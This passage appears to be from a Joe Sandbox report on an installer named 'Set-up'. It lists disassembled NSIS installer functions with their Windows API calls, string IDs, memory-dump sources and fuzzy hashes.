                                                                    • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                    Similarity
                                                                    • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                                                                    • String ID: F$A
                                                                    • API String ID: 3347642858-1281894373
                                                                    • Opcode ID: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
                                                                    • Instruction ID: 610cab7253faed09e83e35c18a41c8795a2522a57bd741f73bb79fe4ae4f2c97
                                                                    • Opcode Fuzzy Hash: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
                                                                    • Instruction Fuzzy Hash: A3B181B1900209BBDB11AFA1CC85AAF7BB8EF45315F10843BFA05B72D1D77C9A418B59
                                                                    Function 00406EFE Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 270filestringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                                                    • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F5C
                                                                    • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FD5
                                                                    • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FE1
                                                                    • lstrcmpA.KERNEL32(name,?), ref: 00406FF3
                                                                    • CloseHandle.KERNEL32(?), ref: 00407212
                                                                      • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                      • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1716102273.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1716082554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716124324.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716244935.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                    Similarity
                                                                    • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                                                                    • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                                                                    • API String ID: 1916479912-1189179171
                                                                    • Opcode ID: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                                                    • Instruction ID: 0b41acfa2c3272d6dc61f6848418d9961a63ce1f0aee58dce5ac99f5834af97b
                                                                    • Opcode Fuzzy Hash: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                                                    • Instruction Fuzzy Hash: 8491CB70D1412DAADF05EBE5C9908FEBBBAEF58301F00406AF592F7290E2385A05DB75
                                                                    Function 00406831 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 212stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,004246CD,74DF23A0,00000000), ref: 00406902
                                                                    • GetSystemDirectoryW.KERNEL32(0046E220,00002004), ref: 00406984
                                                                      • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                    • GetWindowsDirectoryW.KERNEL32(0046E220,00002004), ref: 00406997
                                                                    • lstrcatW.KERNEL32(0046E220,\Microsoft\Internet Explorer\Quick Launch), ref: 00406A11
                                                                    • lstrlenW.KERNEL32(0046E220,00445D80,?,00000000,00404FD5,00445D80,00000000,004246CD,74DF23A0,00000000), ref: 00406A73
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1716102273.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1716082554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716124324.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716244935.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                    Similarity
                                                                    • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                                                    • String ID: F$ F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                    • API String ID: 3581403547-1792361021
                                                                    • Opcode ID: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
                                                                    • Instruction ID: 94ababd57b57874809535cfc920d07d17cc92350817822ff6505e5e4c02fddf3
                                                                    • Opcode Fuzzy Hash: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
                                                                    • Instruction Fuzzy Hash: 9E71D6B1A00112ABDF20AF69CC44A7A3775AB55314F12C13BE907B66E0E73C89A1DB59
                                                                    Function 004024FB Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 133comCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CoCreateInstance.OLE32(0040AC30,?,00000001,0040AC10,?), ref: 0040257E
                                                                    Strings
                                                                    • CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1716102273.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1716082554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716124324.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716244935.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                    Similarity
                                                                    • API ID: CreateInstance
                                                                    • String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
                                                                    • API String ID: 542301482-1377821865
                                                                    • Opcode ID: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
                                                                    • Instruction ID: 17e7a05f0d3b91d3be5025a92c0a08315d4604efbe7233a371b14ee5b096337f
                                                                    • Opcode Fuzzy Hash: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
                                                                    • Instruction Fuzzy Hash: 9E416E74A00205BFCB04EFA0CC99EAE7B79EF48314B20456AF915EB3D1C679A941CB54
                                                                    Function 004079A2 Relevance: .3, Instructions: 347COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1716102273.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1716082554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716124324.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716244935.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
                                                                    • Instruction ID: f621f802e1b16f1afd83cb625a9a5dfb13386b99c5f5a138cca70abed5397206
                                                                    • Opcode Fuzzy Hash: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
                                                                    • Instruction Fuzzy Hash: CEE17A71D04218DFCF14CF94D980AAEBBB1AF45301F1981ABEC55AF286D738AA41CF95
                                                                    Function 0040737E Relevance: .3, Instructions: 303COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1716102273.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1716082554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716124324.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716244935.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
                                                                    • Instruction ID: 563abc6a1943806f9f153a5c0538de096a4a033458f435c3a5efc50f2cd88ab2
                                                                    • Opcode Fuzzy Hash: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
                                                                    • Instruction Fuzzy Hash: 67C16831A042598FCF18CF68C9805ED7BA2FF89314F25862AED56A7384E335BC45CB85
                                                                    Function 004063D8 Relevance: 70.3, APIs: 29, Strings: 11, Instructions: 256libraryloadermemoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063EB
                                                                    • lstrlenW.KERNEL32(?), ref: 004063F8
                                                                    • GetVersionExW.KERNEL32(?), ref: 00406456
                                                                      • Part of subcall function 00406057: CharUpperW.USER32(?,0040642D,?), ref: 0040605D
                                                                    • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406495
                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004064B4
                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004064BE
                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004064C9
                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00406500
                                                                    • GlobalFree.KERNEL32(?), ref: 00406509
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1716102273.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1716082554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716124324.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716244935.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                                                                    • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                                                                    • API String ID: 20674999-2124804629
                                                                    • Opcode ID: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
                                                                    • Instruction ID: cf04814c2eceeca0522e3a2239a4cfb7588c45c97b625e8eb28f179f7b3afb0e
                                                                    • Opcode Fuzzy Hash: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
                                                                    • Instruction Fuzzy Hash: D3919371900219EBDF119FA4CD88AAEBBB8EF04705F11807AE906F7191DB788E51CF59
                                                                    Function 004040E4 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 210windowstringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404199
                                                                    • GetDlgItem.USER32(?,000003E8), ref: 004041AD
                                                                    • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004041CA
                                                                    • GetSysColor.USER32(?), ref: 004041DB
                                                                    • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041E9
                                                                    • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041F7
                                                                    • lstrlenW.KERNEL32(?), ref: 00404202
                                                                    • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040420F
                                                                    • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040421E
                                                                      • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404150,?), ref: 0040400D
                                                                      • Part of subcall function 00403FF6: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404150,?), ref: 0040401C
                                                                      • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404150,?), ref: 00404030
                                                                    • GetDlgItem.USER32(?,0000040A), ref: 00404276
                                                                    • SendMessageW.USER32(00000000), ref: 0040427D
                                                                    • GetDlgItem.USER32(?,000003E8), ref: 004042AA
                                                                    • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042ED
                                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 004042FB
                                                                    • SetCursor.USER32(00000000), ref: 004042FE
                                                                    • ShellExecuteW.SHELL32(0000070B,open,0046E220,00000000,00000000,00000001), ref: 00404313
                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 0040431F
                                                                    • SetCursor.USER32(00000000), ref: 00404322
                                                                    • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404351
                                                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404363
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1716102273.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1716082554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716124324.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716244935.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
                                                                    • String ID: F$N$open
                                                                    • API String ID: 3928313111-1104729357
                                                                    • Opcode ID: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
                                                                    • Instruction ID: b74f7aac3d4bcd21dc7a54326fe4aeb8052e912a1eb6d084c2fa05dc76f75ebb
                                                                    • Opcode Fuzzy Hash: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
                                                                    • Instruction Fuzzy Hash: 5D71B5F1A00209BFDB109F65DD45EAA7B78FB44305F00853AFA05B62E1C778AD91CB99
                                                                    Function 00406AC5 Relevance: 35.2, APIs: 15, Strings: 5, Instructions: 163filestringmemoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • lstrcpyW.KERNEL32(00465E20,NUL,?,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AD5
                                                                    • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AF4
                                                                    • GetShortPathNameW.KERNEL32(000000F1,00465E20,00000400), ref: 00406AFD
                                                                      • Part of subcall function 00405DE2: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                                                      • Part of subcall function 00405DE2: lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                                    • GetShortPathNameW.KERNEL32(000000F1,0046B478,00000400), ref: 00406B1E
                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00465E20,000000FF,00466620,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B47
                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,0046B478,000000FF,00466C70,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B5F
                                                                    • wsprintfA.USER32 ref: 00406B79
                                                                    • GetFileSize.KERNEL32(00000000,00000000,0046B478,C0000000,00000004,0046B478,?,?,00000000,000000F1,?), ref: 00406BB1
                                                                    • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406BC0
                                                                    • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BDC
                                                                    • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406C0C
                                                                    • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,00467070,00000000,-0000000A,0040A87C,00000000,[Rename]), ref: 00406C63
                                                                      • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                      • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                    • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C77
                                                                    • GlobalFree.KERNEL32(00000000), ref: 00406C7E
                                                                    • CloseHandle.KERNEL32(?), ref: 00406C88
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1716102273.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1716082554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716124324.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716244935.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                    Similarity
                                                                    • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                                    • String ID: ^F$%s=%s$NUL$[Rename]$plF
                                                                    • API String ID: 565278875-3368763019
                                                                    • Opcode ID: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
                                                                    • Instruction ID: 187392fb1a539ff374a899d42f74550c270b9899c721d3c7d9f4fe98b52eb23c
                                                                    • Opcode Fuzzy Hash: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
                                                                    • Instruction Fuzzy Hash: F2414B322082197FE7206B61DD4CE6F3E6CDF4A758B12013AF586F21D1D6399C10867E
                                                                    Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 127COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                    • BeginPaint.USER32(?,?), ref: 00401047
                                                                    • GetClientRect.USER32(?,?), ref: 0040105B
                                                                    • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                                                    • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                                                    • DeleteObject.GDI32(?), ref: 004010F6
                                                                    • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                                                    • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                                                    • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                                                    • SelectObject.GDI32(00000000,?), ref: 00401149
                                                                    • DrawTextW.USER32(00000000,00476AA0,000000FF,00000010,00000820), ref: 0040115F
                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                                                    • DeleteObject.GDI32(?), ref: 0040116E
                                                                    • EndPaint.USER32(?,?), ref: 00401177
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1716102273.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1716082554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716124324.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716244935.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                    Similarity
                                                                    • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                    • String ID: F
                                                                    • API String ID: 941294808-1304234792
                                                                    • Opcode ID: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                                                    • Instruction ID: 3a901b8e11bd10f40e8c3d59bf329074d7a31f92ad936af625f7db958ebfa50f
                                                                    • Opcode Fuzzy Hash: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                                                    • Instruction Fuzzy Hash: BF518772800209AFCF05CF95DD459AFBBB9FF45315F00802AF952AA1A1C738EA50DFA4
                                                                    Function 00402880 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 131registrystringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
                                                                    • lstrlenW.KERNEL32(004140F8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
                                                                    • RegSetValueExW.ADVAPI32(?,?,?,?,004140F8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
                                                                    • RegCloseKey.ADVAPI32(?), ref: 004029E4
                                                                      • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                      • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                    Strings
                                                                    • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
                                                                    • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                                                                    • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                                                                    • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                                                                    • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                                                                    • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1716102273.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1716082554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716124324.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716244935.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                    Similarity
                                                                    • API ID: lstrlen$CloseCreateValuewvsprintf
                                                                    • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                                                                    • API String ID: 1641139501-220328614
                                                                    • Opcode ID: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
                                                                    • Instruction ID: c6ff7831871a22410ebf281ca69ba80d881ba5d3dc99c3f31bea2db7712f227d
                                                                    • Opcode Fuzzy Hash: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
                                                                    • Instruction Fuzzy Hash: EE418BB2D00208BFCF11AF91CD46DEEBB7AEF44344F20807AF605761A2D3794A509B69
                                                                    Function 00406113 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 72filestringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                                                    • GetFileAttributesW.KERNEL32(00476240,?,00000000,00000000,?,?,00406300,00000000), ref: 00406168
                                                                    • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,00476240,40000000,00000004), ref: 004061A1
                                                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,00476240,40000000,00000004), ref: 004061AD
